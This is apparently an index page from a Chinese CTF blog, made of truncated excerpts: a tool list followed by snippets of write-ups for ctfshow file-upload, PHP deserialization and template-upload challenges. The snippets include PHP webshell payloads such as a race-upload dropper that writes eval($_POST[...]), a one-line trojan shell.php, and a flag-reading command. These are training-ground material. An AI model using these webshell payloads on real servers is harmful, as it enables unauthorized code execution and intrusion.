常用资源汇总由于本人脑子不好使，经常忘一些东西，故写篇文章汇总一些资源以便随时使用。 命令类GitfastbootADB 工具类Arjun sqlmap fenjing flask-session-cookie-manager fastcoll

文件上传web161-163文件头伪造1GIF89a 竞争上传123<?php$f=fopen("7.php","w");fputs($f,'<?php eval($_POST[7]);?>');?> web164上传一个正常的图片，发现查看图片的时候存在文件包含漏洞，打一个图片马 12345678910111

引子[SHCTF_3rd]Eazy_Pyrunner通过任意文件读取漏洞我们可以读到源代码 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818

[阶段1] Ezphp这里还是知识欠缺了，最后读文件用的是php的原生类:( 基本的链子会写，关键就是最后一步原生类的利用 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768<?phphig

平台和💩一样 新年贺卡当action=admin的时候可以添加模版，并且保存的格式是php 所以我们上传一个shell.php，内容是一句话木马 猜测TEMPLATE_DIR 是templates，访问http://xxx/templates/shell.php 预期解应该是传一个php 1echo `cat /f*` 然后生成并下载贺卡，在生成的时候就会加载模版文件 并发上传题目名

好玩的PHP123456789101112131415161718192021222324252627282930<?php error_reporting(0); highlight_file(__FILE__); class ctfshow { private $d = ''; private $s =